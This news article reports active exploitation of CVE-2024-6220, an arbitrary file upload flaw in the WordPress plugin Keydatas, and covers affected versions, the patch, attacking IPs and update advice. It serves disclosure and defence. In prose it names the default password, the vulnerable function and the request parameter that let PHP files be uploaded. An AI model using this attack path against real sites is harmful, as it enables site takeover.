WordPress Plugin Flaw Allows Hackers to Take Over Sites

Hackers Exploit Dangerous Plugin Bug

Hackers are taking advantage of a serious weakness in a popular WordPress plugin called 简数采集器 (Keydatas). This security flaw, known as CVE-2024-6220, lets hackers upload any files they want to a WordPress site. This means they could run harmful code and completely control the site.

Discovery and Initial Response

The problem was discovered on June 18, 2024, by a researcher named Foxyyy. This happened during the 0-day Threat Hunt Promo of Wordfence’s Bug Bounty Program. Foxyyy quickly reported the flaw to the appropriate authorities. The vulnerability was found in the Keydatas plugin, which is used by more than 5,000 websites. Within a few days, hackers started trying to exploit this flaw.

Details of the Vulnerability

The flaw, CVE-2024-6220, affects all versions of the Keydatas plugin up to and including version 2.5.2. Here are the main details:

Plugin: 简数采集器 (Keydatas)

Plugin Slug: keydatas

Affected Versions: Up to and including 2.5.2

CVE ID: CVE-2024-6220

CVSS Score: 9.8 (Critical)

Researcher: Foxyyy

Fully Patched Version: 2.6.1

Bounty Award: $488.00

The problem occurs because the plugin does not check the type of files being uploaded. This allows hackers to upload harmful files, like malicious PHP scripts, to the WordPress uploads directory. This directory is publicly accessible, so hackers can run these harmful scripts and take over the site.

How the Attack Works

The Keydatas plugin is used to connect a WordPress site with the keydatas.com app. This app helps manage WordPress posts. The plugin has a function called keydatas_post_doc() that includes a password check. However, the default password is set to “keydatas.com”.

If site owners do not change this default password, hackers can exploit the plugin’s functions. One of these functions, keydatas_downloadImages(), is the vulnerable one. This function downloads files specified in the __kds_docImgs request parameter and uploads them to the WordPress uploads directory. Since there are no checks on the file type or extension, hackers can upload harmful PHP files.

Top Attacking IP Addresses

Several IP addresses have been identified as sources of these attacks:

  • 103.233.8.166 (Hong Kong)
  • 103.233.8.0 (Hong Kong)
  • 163.172.77.82 (France)
  • 84.17.37.217 (Hong Kong)
  • 84.17.57.0 (Hong Kong)

Protecting Your Site

Wordfence Premium, Care, and Response users received a firewall rule to protect against this vulnerability on June 20, 2024. Free users got the same protection on July 20, 2024. The Keydatas team was contacted on June 20, 2024. After receiving no response, the issue was escalated to the WordPress.org Security Team, leading to the plugin’s closure on July 16, 2024. A patch was released on July 29, 2024.

Users are strongly urged to update to the latest version, 2.6.1, immediately. To stay safe from such attacks, it’s essential to regularly update plugins, conduct vulnerability scans, and use robust firewall protection.

The active exploitation of the CVE-2024-6220 vulnerability in the Keydatas plugin highlights the critical need for vigilance in maintaining website security. By staying informed and proactive, website owners can protect their sites from malicious attacks and ensure a safer web environment for everyone.